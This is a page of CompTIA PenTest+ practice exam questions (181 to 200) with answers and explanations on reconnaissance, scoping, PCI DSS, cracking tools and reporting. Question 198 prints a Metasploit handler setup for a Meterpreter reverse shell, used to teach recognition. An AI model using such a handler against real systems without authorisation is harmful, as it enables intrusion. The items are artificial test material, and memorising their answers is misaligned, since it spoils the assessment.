CompTIA PenTest+ Exam Questions

Page 10 of 25

181.

During information gathering, you want to enumerate the operating systems of live hosts. What is this process called?

  • Fingerprinting

  • Service and version identification

  • Eavesdropping

  • Packet crafting and inspection

Correct answer: Fingerprinting

Fingerprinting refers to identifying a system's operating system by analyzing its network traffic. Differences such as the services a system runs and the order in which it sends packets can give clues about its operating system and version.

Service and version identification refers to identifying a service on a system based on its responses. Eavesdropping refers to passively sniffing packets that cross a network. Packet crafting and inspection refers to creating custom packets and analyzing the response to gain the information needed from a target.

182.

As part of the post-engagement cleanup activities, you should:

  • Remove any shells, tools, or accounts created on the targeted system

  • Attempt lateral movement

  • Hide all tools and backdoors created for future use

  • Update the system and patch all vulnerabilities found

Correct answer: Remove any shells, tools, or accounts created on the targeted system

There are mandatory actions related to post-engagement activities. Removing all malicious software or tools, including backdoors, shells, scripts, scheduled tasks, and so on, is very important. Any accounts created by the tester during the engagement should be deleted or well-documented in the report.

183.

In the planning phase of a pentest, which of the following topics is the MOST important to consider?

  • Target selection

  • Pentesting tools

  • Firewall rules

  • Number of VLANs in the environment

Correct answer: Target selection

Selecting the targets to include in the engagement is crucial, as the organization may have many assets (people, processes, facilities, and technologies) located throughout the world that need to be considered during the target selection process.

Pentesting tools, firewall rules, and VLANs can be considered after the targets have been determined.

184.

Which of the following situations could be an indicator of an attacker using a living-off-the-land technique?

  • Frequent use of built-in utilities for unexpected tasks

  • Sudden download of unrecognized applications to the compromised system

  • An increase in the number of disk read and write operations

  • Modification of the system's firmware

Correct answer: Frequent use of built-in utilities for unexpected tasks

A living-off-the-land technique is characterized by using built-in tools of the operating system rather than downloading malware. By using existing tools, it can be harder to detect the intruder.

Downloading malware is a characteristic of traditional attacks.

Disk read/write operations and firmware modifications are not specific to living-off-the-land attacks.

185.

When using Aircrack-ng to implement an evil twin, which of the following steps is included?

  • Deauthentication

  • Session fixation

  • Password spraying

  • Jamming

Correct answer: Deauthentication

Evil twin attacks involve cloning a legitimate access point, using a deauthentication attack, and ensuring the evil twin is more powerful or closer than the legitimate access point. This allows for an on-path attack to be conducted. Once you have successfully conducted an on-path attack, you can also work on credential harvesting by capturing unencrypted traffic between the client and remote systems and services.

Session fixation is an attack on a web application server's session IDs. Password spraying is using common credentials to attempt authentication. Jamming is causing deliberate interference on a network.

186.

You are preparing the recommendations section of the pentest report. You need to address the weak cryptographic security of passwords stored as LM hashes.

What section should this recommendation be put into?

  • Technical

  • Operational

  • Administrative

  • Physical

Correct answer: Technical

In this situation, a simple technology improvement could resolve the vulnerability and completely remove the risk. Migration to a more secure password hashing function would be mandatory.

Operational controls include user training and mandatory vacations. Administrative controls include policies and access controls. Physical controls include surveillance systems and biometrics.

187.

A pentester is looking for a tool for offline password cracking. They would like to take advantage of the GPU cores on their machine.

Which tool should they use?

  • Hashcat

  • John the Ripper

  • Mimikatz

  • Hydra

Correct answer: Hashcat

Hashcat is a password-cracking utility that uses Graphics Processing Units (GPUs) to crack passwords at a very high rate of speed. Hashcat is much faster than traditional tools, making it a tool of choice if you have access to appropriate hardware.

John the Ripper is a CPU-bound password-cracking tool. Mimikatz is a post-exploitation tool used in Windows environments. Hydra is a network login brute-forcing tool.

188.

Through threat modeling, the client determines that their main adversaries are determined nation-states using complex attack techniques. Which sort of threat actor is the organization MOST worried about?

  • APT

  • Casual hacker

  • Hacktivist

  • Insider threat

Correct answer: APT

An advanced persistent threat (APT) is a type of threat actor motivated to steal sensitive information from high-profile targets using sophisticated hacking capabilities.

A casual hacker uses available tools to find weak targets. A hacktivist is motivated by ideology. An insider threat originates from inside the organization.

189.

In the pre-engagement phase of a penetration test, the tester and the client are identifying the systems, applications, and networks that will be tested, as well as any specific requirements that will be needed.

What type of activity are they engaged in?

  • Scoping

  • Enumerating

  • Sniffing

  • Scraping

Correct answer: Scoping

The list of targets and the limits of the penetration test are structured and detailed as the scope of the test. The test scope could be a separate document or part of some other document related to the pentest. Defining the scope is extremely important and should be done with care.

Enumerating refers to using a tool to get a list of systems on a network. Sniffing involves listening to traffic that crosses a network. Scraping involves systematically gathering information from websites.

190.

What is the ethical course of action to take if a pentester discovers that a real attacker has already breached a client's network?

  • Notifying the client immediately

  • Attempting to contact the attacker

  • Noting the attack to add to the final report later

  • Covering the tracks of the attacker

Correct answer: Notifying the client immediately

If a pentester discovers an attack, they should immediately notify the client rather than wait until the end of the test.

191.

You are performing a penetration test at a retail store that handles credit cards onsite.

Which of the following do you need to consider when performing this test?

  • PCI DSS

  • GDPR

  • HIPAA

  • FIPS 140-2

Correct answer: PCI DSS

The Payment Card Industry Data Security Standard (PCI DSS) sets the rules for completing assessments for credit card processing environments and systems.

The General Data Protection Regulation (GDPR) is a European Union regulation that protects data and privacy.

The Health Insurance Portability and Accountability Act of 1996 (HIPAA) is a federal law to protect sensitive patient health information.

FIPS 140-2 is a U.S. government computer security standard used to approve cryptographic modules.

192.

You are being tasked to perform a penetration test which includes Android mobile devices. What tool could you use to test the security on those devices?

  • Drozer

  • OpenVAS

  • Nexpose

  • Needle

Correct answer: Drozer

Drozer from MWR Labs (formerly known as Mercury) is one of the most widely used Android security frameworks for pentesting Android applications. Drozer enables scanning for security vulnerabilities in Android applications by taking the role of a built-in Android application and interacting with the Dalvik Virtual Machine, other applications' IPC endpoints, and the OS beneath.

OpenVAS is a software framework of several services and tools offering vulnerability scanning and vulnerability management. Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. Needle is an open-source tool for testing the security of iOS apps.

193.

An attacker is analyzing the randomness and complexity of the session ID generation on a targeted website. They notice a pattern in which each new session ID is generated following a simple algorithm.

What attack technique will they MOST likely use against the site?

  • Cookie manipulation

  • Pass the hash

  • Kerberos golden ticket

  • Credential harvesting

Correct answer: Cookie manipulation

In cases where developers generate their own session IDs, if adequate randomness and complexity are not applied, the cookie value can be manipulated to identify a valid session, which means the application could be susceptible to brute-force attacks.

A pass the hash attack uses a hashed password. A Kerberos golden ticket attacks a domain controller. Credential harvesting refers to tricking users into divulging sensitive information.

194.

Which of the following is NOT a vulnerability scanner?

  • Maltego

  • Nessus

  • Nikto

  • Acunetix

Correct answer: Maltego

Maltego is a commercial product used to visualize the results of OSINT. It is a popular tool for passive reconnaissance.

Nessus is a proprietary vulnerability scanner. Nikto is a free, open-source command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software, and other problems. It performs generic and server-type-specific checks. It also captures and prints any cookies received. Acunetix is an end-to-end web security scanner that offers a 360-degree view of an organization's security.

195.

A client contacts you three months after the completion of a pentest. They have been hacked through a vulnerability not listed in your report and are asking for an explanation.

What should you do?

  • Refer the client to the pentest report disclaimers

  • Accept the responsibility and cover the losses

  • Refer the client to your legal team

  • Conduct a security analysis to verify the initial attack vector

Correct answer: Refer the client to the pentest report disclaimers

The testing agreement or scope documentation should contain disclaimers explaining that the test is valid only at the point in time when it is conducted and that the scope and methodology that were chosen can impact the comprehensiveness of the test.

196.

Which of the following data types is considered sensitive authentication data by PCI DSS?

  • CAV2

  • PAN

  • Expiration date

  • Service code

Correct answer: CAV2

Account data is divided into cardholder data and sensitive authentication data. Sensitive authentication data includes full track data (magnetic stripe or chip), CAV2/CVC2/CVV2/CID, and PINs/PIN blocks.

Primary account number (PAN), expiration date, and service code are considered cardholder data.

197.

A software developer is interested in creating an application that handles network print jobs. What can they consult to see a broad range of weaknesses associated with similar types of software?

  • CWE

  • CVE

  • CAPEC

  • FOCA

Correct answer: CWE

The Common Weakness Enumeration (CWE) is a community-developed list of common software and hardware security weaknesses. It is published and maintained by The MITRE Corporation.

CVE identifies specific, publicly disclosed vulnerabilities. CAPEC catalogs attack patterns seen in the wild. FOCA is a tool that extracts metadata from documents.

198.

Given the Metasploit excerpt below, what type of attack is a pentester attempting?

    $ ./msfconsole -q
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.1.123
    lhost => 192.168.1.123
    msf exploit(handler) > set lport 4444
    lport => 4444
    msf exploit(handler) > run

  • Reverse shell

  • User enumeration

  • Binding shell

  • Pass-the-hash

Correct answer: Reverse shell

The Metasploit Meterpreter shell and reverse shell are effective ways of interacting with a target environment, as they run entirely in memory and leave little or no trace after disconnecting. When the payload chosen is "windows/meterpreter/reverse_tcp", the handler is setting up a reverse shell: the target connects back to the listener at the configured lhost and lport.

199.

How could a pentester use The Wayback Machine?

  • To see an archive of the client's website that may include previously posted sensitive information

  • To view the source code of the client's back-end web application code along with previous code versions

  • To filter web pages based on advanced queries that can reveal sensitive information

  • To extract information from the metadata of files

Correct answer: To see an archive of the client's website that may include previously posted sensitive information

The Wayback Machine is run by the Internet Archive, and it keeps archives of websites. A pentester can see any sensitive information that may have been posted but later deleted.

The client's back-end web application code is not likely to be made public. Google dorks are used to filter web pages based on advanced queries that can reveal sensitive information. Tools such as Exif are used to extract information from the metadata of files.

200.

Which of the following types of reconnaissance can be gathered passively?

  • Infrastructure, domains, IP ranges and routes for the organization

  • Open ports

  • Running services

  • Vulnerabilities

Correct answer: Infrastructure, domains, IP ranges and routes for the organization

Infrastructure reconnaissance is part of the passive information-gathering process.

Open ports and running services are discovered by active scanning. Vulnerabilities are discovered by active scanning or manual validation (which is also active).